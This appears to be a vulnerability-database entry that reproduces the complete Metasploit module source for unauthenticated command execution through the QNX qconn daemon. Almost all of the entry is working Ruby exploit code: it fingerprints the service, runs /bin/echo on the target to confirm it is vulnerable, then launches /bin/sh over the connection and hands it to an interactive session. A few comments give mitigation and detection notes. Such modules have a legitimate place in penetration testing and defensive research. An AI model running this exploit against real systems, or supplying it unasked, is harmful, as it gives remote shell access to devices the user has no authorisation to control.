QNX qconn Command Execution

2012-09-30T07:51:08
ID MSF:EXPLOIT/UNIX/MISC/QNX_QCONN_EXEC
Type metasploit
Reporter Rapid7
Modified 2019-01-10T19:19:14

Description

This module uses the qconn daemon on QNX systems to gain a shell. The QNX qconn daemon does not require authentication and allows remote users to execute arbitrary operating system commands. This module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

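# Metasploit module for the unauthenticated command launcher exposed by the
# QNX qconn daemon.
#
# Per the module description, qconn does not require authentication and lets
# remote users execute arbitrary operating system commands. Any host that can
# reach the listening port (RPORT defaults to 8000 here) can therefore start
# processes on the target.
#
# Defensive notes:
# * Mitigation: keep qconn off deployed systems, or restrict its port to a
#   trusted network. qconn is presumably meant for development targets;
#   confirm against the QNX qconn references listed below.
# * Detection: the module speaks a line-oriented text protocol. A TCP stream
#   with the "QCONN" banner followed by "service launcher" and a
#   "start/flags run" request is the pattern produced here.
#
# This module path is deprecated (see the `deprecated` call) in favour of
# exploit/qnx/qconn/qconn_exec.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Module::Deprecated

  deprecated(Date.new(2018, 10, 17), 'exploit/qnx/qconn/qconn_exec')

  # Registers module metadata and the two user-facing options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'QNX qconn Command Execution',
      'Description'    => %q{
        This module uses the qconn daemon on QNX systems to gain a shell.

        The QNX qconn daemon does not require authentication and allows
        remote users to execute arbitrary operating system commands.

        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
        and 6.5.0 SP1 (x86).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'David Odell',  # Discovery
          'Mor!p3r',      # PoC
          'bcoles' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '21520'],
          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']
        ],
      'Payload'        =>
        {
          'BadChars'    => '',
          'DisableNops' => true,
          # The session reuses the socket the module already opened ('find')
          # and is driven interactively, so no separate payload is delivered.
          'Compat'      =>
            {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find'
            }
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'PAYLOAD'  => 'cmd/unix/interact'
        },
      'Platform'       => 'unix', # QNX Neutrino
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 4 2012',
      'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])
      ])
  end

  # Determines whether the remote service is a qconn daemon that launches
  # commands without authentication.
  #
  # The probe has three steps: the banner must contain "QCONN", the
  # "service launcher" request must be answered with "OK", and a random
  # marker passed to /bin/echo must come back on the socket.
  #
  # @return [CheckCode] Unknown when nothing is received after connecting,
  #   Safe when any step yields an unexpected reply, Vulnerable when the
  #   marker is echoed back
  def check
    vprint_status 'Sending check...'

    connect
    res = sock.get_once(-1, 10)

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    return CheckCode::Safe unless res.include? 'QCONN'

    sock.put "service launcher\n"
    res = sock.get_once(-1, 10)

    return CheckCode::Safe if res.nil? || !res.include?('OK')

    # A random marker means a match can only come from the echo actually
    # running on the target, not from static banner text.
    fingerprint = Rex::Text.rand_text_alphanumeric rand(5..10)
    sock.put "start/flags run /bin/echo /bin/echo #{fingerprint}\n"

    # The earlier revision re-tested the launcher reply at this point without
    # reading from the socket again. That test could never fail, so it is
    # dropped; the marker comparison below is the real verification.

    Rex.sleep 1

    res = sock.get_once(-1, 10)

    return CheckCode::Safe if res.nil? || !res.include?(fingerprint)

    CheckCode::Vulnerable
  ensure
    # Close the probe connection on every exit path, not only on success,
    # so an aborted check does not leave a socket open.
    disconnect
  end

  # Runs the check, then opens a fresh connection and asks the qconn launcher
  # service to start the shell named by the SHELL option on that connection.
  #
  # Calls fail_with when the target is not reported vulnerable, when no
  # banner arrives, or when any reply is not the expected one.
  def exploit
    unless check == CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    connect
    res = sock.get_once(-1, 10)

    fail_with Failure::Unreachable, 'Connection failed' unless res

    unless res.include? 'QCONN'
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    sock.put "service launcher\n"
    res = sock.get_once(-1, 10)

    if res.nil? || !res.include?('OK')
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    print_status 'Sending payload...'
    sock.put "start/flags run #{datastore['SHELL']} -\n"

    Rex.sleep 1

    unless negotiate_shell sock
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    print_good 'Payload sent successfully'

    # The socket stays open: the session handler takes over this connection.
    handler
  end

  # Reads from the socket until the output looks like a started shell.
  #
  # @param sock [Object] connected socket to read from; it shadows the
  #   module's own `sock` accessor inside this method
  # @return [true, nil] true once the data contains '#' or
  #   'No controlling tty'; nil on an empty read or after 15 seconds
  def negotiate_shell(sock)
    Timeout.timeout(15) do
      loop do
        data = sock.get_once(-1, 10)

        return nil if !data || data.empty?

        if data.include?('#') || data.include?('No controlling tty')
          return true
        end

        Rex.sleep 0.5
      end
    end
  rescue ::Timeout::Error
    nil
  end
end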